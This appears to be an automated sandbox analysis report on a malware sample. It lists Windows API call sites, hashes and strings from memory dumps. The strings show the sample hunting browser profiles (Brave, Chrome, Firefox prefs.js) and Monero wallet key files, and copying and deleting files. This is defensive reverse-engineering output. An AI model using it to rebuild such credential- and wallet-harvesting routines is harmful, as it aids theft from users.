                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: b0d7de9c3eb3a7730e22ee3d28102c7f629f65bcf3135c291d7379d4b65fef89
                              • Instruction ID: 551e9ee96da8a2014f7cd1ca5dc3bb6fc5c1b05f5108bebc3f3ea8e2251ecf11
                              • Opcode Fuzzy Hash: b0d7de9c3eb3a7730e22ee3d28102c7f629f65bcf3135c291d7379d4b65fef89
                              • Instruction Fuzzy Hash: 304234B291010CABCB14FB60DD56FFD737DABD4300F408568BA0A96191EE74AF49CB96
                              APIs
                              • wsprintfA.USER32 ref: 009F492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F4943
                              • StrCmpCA.SHLWAPI(?,00A00FDC), ref: 009F4971
                              • StrCmpCA.SHLWAPI(?,00A00FE0), ref: 009F4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F4B7D
                              • FindClose.KERNEL32(000000FF), ref: 009F4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 117be5635da298c2376305cb7b8bcb61a511249547456e38486f172bc35abbed
                              • Instruction ID: 1ef2e68365083b3a756dadb7b0968808c3383d1409686cf963bfffcb9fec5af8
                              • Opcode Fuzzy Hash: 117be5635da298c2376305cb7b8bcb61a511249547456e38486f172bc35abbed
                              • Instruction Fuzzy Hash: 0E6114B1910219ABCB34EBA4DC45FFE737CBB88701F044598B60996181EB75EB85CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009F4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F4587
                              • wsprintfA.USER32 ref: 009F45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F45BD
                              • StrCmpCA.SHLWAPI(?,00A00FC4), ref: 009F45EB
                              • StrCmpCA.SHLWAPI(?,00A00FC8), ref: 009F4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F468B
                              • FindClose.KERNEL32(000000FF), ref: 009F46A0
                              • lstrcat.KERNEL32(?,013BE3B0), ref: 009F46C5
                              • lstrcat.KERNEL32(?,013BD1F8), ref: 009F46D8
                              • lstrlen.KERNEL32(?), ref: 009F46E5
                              • lstrlen.KERNEL32(?), ref: 009F46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 0533a971a69fc0ea6e4a29c31d556b63cc2a89962c166d7bad9e862eeaa89569
                              • Instruction ID: b13d0343f60f2df5ef9eac9918d40980b61d500c19456e0293a91d3ab4f36f7f
                              • Opcode Fuzzy Hash: 0533a971a69fc0ea6e4a29c31d556b63cc2a89962c166d7bad9e862eeaa89569
                              • Instruction Fuzzy Hash: 3F5132B195021CABCB64EB70DC89FFE737CAB58700F404998B61996190EF74DB858F92
                              APIs
                              • wsprintfA.USER32 ref: 009F3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F3EDA
                              • StrCmpCA.SHLWAPI(?,00A00FAC), ref: 009F3F08
                              • StrCmpCA.SHLWAPI(?,00A00FB0), ref: 009F3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F406C
                              • FindClose.KERNEL32(000000FF), ref: 009F4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: efd6c4c8c3993379bedc6c89ef220c5e8b84389fdf876d81620c1892a021f55c
                              • Instruction ID: 394481b34840c6b2a964ccb142b595f43c0ab5579eae64bd1678e254741add07
                              • Opcode Fuzzy Hash: efd6c4c8c3993379bedc6c89ef220c5e8b84389fdf876d81620c1892a021f55c
                              • Instruction Fuzzy Hash: C75132B6910218ABCB24EBB0DC85FFE737CBB84300F404588B75996180DB75EB868F55
                              APIs
                              • wsprintfA.USER32 ref: 009EED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 009EED55
                              • StrCmpCA.SHLWAPI(?,00A01538), ref: 009EEDAB
                              • StrCmpCA.SHLWAPI(?,00A0153C), ref: 009EEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EF2AE
                              • FindClose.KERNEL32(000000FF), ref: 009EF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: e45c4b1d215689123b9603ff27c5c86b55c2ce1c21aae25d3c760ff7048ff75c
                              • Instruction ID: e50aff57dcf210c8a2ad432e7e9abf4c0024aad5d473cc44d5b9f3764d95d2bb
                              • Opcode Fuzzy Hash: e45c4b1d215689123b9603ff27c5c86b55c2ce1c21aae25d3c760ff7048ff75c
                              • Instruction Fuzzy Hash: 41E1EFB191111CAADB55FB60DC52FFE7338AF94340F4045A9B60E62092EE706F8ACF56
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A015B8,00A00D96), ref: 009EF71E
                              • StrCmpCA.SHLWAPI(?,00A015BC), ref: 009EF76F
                              • StrCmpCA.SHLWAPI(?,00A015C0), ref: 009EF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EFAB1
                              • FindClose.KERNEL32(000000FF), ref: 009EFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 0f106f166408715ff19e79f4e9e7c93eb3a1521aa711721c00dd01335afd3a11
                              • Instruction ID: 618e4b68eab81a6ddb7056af233d569c60c69f414030b507e354979c6bd660ab
                              • Opcode Fuzzy Hash: 0f106f166408715ff19e79f4e9e7c93eb3a1521aa711721c00dd01335afd3a11
                              • Instruction Fuzzy Hash: EAB131B191010C9BCB24FF60DC96FFE7379AF94300F4085A9A50E96195EF70AB49CB96
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A0510C,?,?,?,00A051B4,?,?,00000000,?,00000000), ref: 009E1923
                              • StrCmpCA.SHLWAPI(?,00A0525C), ref: 009E1973
                              • StrCmpCA.SHLWAPI(?,00A05304), ref: 009E1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009E1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 009E1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009E1E20
                              • FindClose.KERNEL32(000000FF), ref: 009E1E32
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 7129556e686b1b2631b6d8aa6d82458b3e33755800fd7f5328f5e61a389f8ac4
                              • Instruction ID: 50c8327f398e448c8e6677afd3985170d8580286a99d30a1414a9d13682cd2b5
                              • Opcode Fuzzy Hash: 7129556e686b1b2631b6d8aa6d82458b3e33755800fd7f5328f5e61a389f8ac4
                              • Instruction Fuzzy Hash: 5812DEB191011CABDB19EB60DC96FFE7378AF94340F4045A9A60A62091EF706F89CF95
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A00C2E), ref: 009EDE5E
                              • StrCmpCA.SHLWAPI(?,00A014C8), ref: 009EDEAE
                              • StrCmpCA.SHLWAPI(?,00A014CC), ref: 009EDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EE3E0
                              • FindClose.KERNEL32(000000FF), ref: 009EE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 745fca0e058a8d9cb923aa6c42383c6903efeccc8f50d72e588a5400a278d711
                              • Instruction ID: 8e84b1ad31affee874d7ae549f65713c7e7225949493d0c41c1428b3b69fbe05
                              • Opcode Fuzzy Hash: 745fca0e058a8d9cb923aa6c42383c6903efeccc8f50d72e588a5400a278d711
                              • Instruction Fuzzy Hash: AAF19DB181411DAADB25EB60DC95FFE7338BF94340F8045A9A60E62091EF706F8ACF55
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A014B0,00A00C2A), ref: 009EDAEB
                              • StrCmpCA.SHLWAPI(?,00A014B4), ref: 009EDB33
                              • StrCmpCA.SHLWAPI(?,00A014B8), ref: 009EDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EDDCC
                              • FindClose.KERNEL32(000000FF), ref: 009EDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 7def12d4b8d8435c6f30e9770c81dfc0795de9002465f148b0e4473a342b7cd0
                              • Instruction ID: bfe4084ddef5fd980812193d8768153f0f58c48ba675a8ecf01571fb61d271d0
                              • Opcode Fuzzy Hash: 7def12d4b8d8435c6f30e9770c81dfc0795de9002465f148b0e4473a342b7cd0
                              • Instruction Fuzzy Hash: 489167B2910108A7CB15FB70EC96FFD737DABC4340F408568F90A96191EE74AB49CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &3~~$&\=$3gZ$5)y$9w;7$:oo$R|6}$T|6}$z8-
                              • API String ID: 0-496644944
                              • Opcode ID: 27ea8262b94176998c339f81b9e5287da1cdc23c58085b251830670d6455c904
                              • Instruction ID: e7f7622fa7064822c4cddbf673f41fc080c2fc2acd52dfc7d6dae906b783fd4e
                              • Opcode Fuzzy Hash: 27ea8262b94176998c339f81b9e5287da1cdc23c58085b251830670d6455c904
                              • Instruction Fuzzy Hash: E5B22BF3A0C2109FE304AE2DEC8567ABBE5EFD4760F1A853DEAC4D3744E53598058692
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00A005AF), ref: 009F7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 009F7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 009F7C0D
